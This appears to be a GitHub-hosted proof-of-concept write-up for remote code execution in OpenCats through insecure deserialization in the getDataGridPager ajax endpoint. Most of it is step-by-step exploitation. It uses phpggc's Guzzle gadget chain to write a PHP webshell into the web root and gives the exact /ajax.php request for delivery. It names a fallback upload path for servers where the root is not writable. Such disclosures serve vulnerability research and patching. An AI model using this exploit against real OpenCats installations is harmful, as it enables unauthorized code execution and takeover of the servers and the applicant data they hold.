Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Remote Code Execution via insecure deserialization in OpenCats getDataGridPager's ajax functionality.

Vulnerable code

1

How to achieve command execution

Useful information: OpenCats uses Guzzle, it can be used as a gadget chain.
It is possible to craft serialized object using phpggc tool, that has Guzzle gadget chain predefined.

  1. Create payload that will be executed. I will use phpinfo().
    echo "<?php phpinfo(); ?>" > /tmp/shell.php

  2. Create serialized payload with phpggc that will upload malicous shell to provided directory on web server.
    ./phpggc -u --fast-destruct Guzzle/FW1 /var/www/html/opencats/pwned.php /tmp/shell.php

2

  1. Copy the payload inside 'p' parameter.
    /ajax.php?f=getDataGridPager&i=1&p=PAYLOAD_FROM_PREVIOUS_STEP

3

  1. Execute webshell.

4

Ending notes. Upload location might vary from system to system, depending if www-data has write permission to web server's root directory. In case / (web server's root) is not writeable, upload a webshell to '/upload/pwned.php' instead.